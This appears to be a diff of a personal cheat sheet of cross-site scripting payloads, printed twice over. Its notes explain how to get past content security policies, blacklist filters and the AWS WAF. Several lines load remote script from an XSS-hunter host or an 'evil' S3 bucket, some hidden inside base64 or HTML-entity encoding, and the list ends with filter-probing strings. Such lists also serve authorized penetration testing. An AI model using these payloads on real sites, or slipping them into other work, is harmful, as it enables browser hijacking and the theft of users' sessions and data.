Uyavuz24 · October 11, 2020 19:02
diff --git a/XSS payloads b/XSS payloads
 <iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!!
 <svg/onload=alert(1)> //this is everywhere
 <img src=x onerror=alert(document.domain)>  //this is also everywhere
 "><script src=https://ubey.xss.ht></script>
 javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)')  //For use where URI's are taken as input.
 "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
 "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags are explicitly filtered.
 "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> //HTML5 payload, only works in Firefox, Chrome and Opera
 "><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;ubey.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
 <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ubey.xss.ht");a.send();</script> //For exploitation of web applications with Content Security Policies containing script-src but have unsafe-inline enabled.
 <script>$.getScript("//ubey.xss.ht")</script> // Example payload for sites that include JQuery
 /*\"<sVg/oNloAd=alert(document.domain)//>\x3e
 <!<script>alert(1)</script> //AWS WAF
 <h2
 <h2>
 "test
 'test
 <h2?
 <%0dh2
 </script/x>
 <sCriPt>
 !'+%&/()=?_-<|>"
 fileformat.info unicode chars, hex, encoded
	<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!!
	<svg/onload=alert(1)> //this is everywhere
	<img src=x onerror=alert(document.domain)> //this is also everywhere
	"><script src=https://ubey.xss.ht></script>
	javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URI's are taken as input.
	"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
	"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags are explicitly filtered.
	"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> //HTML5 payload, only works in Firefox, Chrome and Opera
	"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://ubey.xss.ht";parent.document.body.appendChild(a);</script>">
	<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ubey.xss.ht");a.send();</script> //For exploitation of web applications with Content Security Policies containing script-src but have unsafe-inline enabled.
	<script>$.getScript("//ubey.xss.ht")</script> // Example payload for sites that include JQuery
	/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
	<!<script>alert(1)</script> //AWS WAF
	<h2
	<h2>
	"test
	'test
	<h2?
	<%0dh2
	</script/x>
	<sCriPt>
	!'+%&/()=?_-<\|>"
	fileformat.info unicode chars, hex, encoded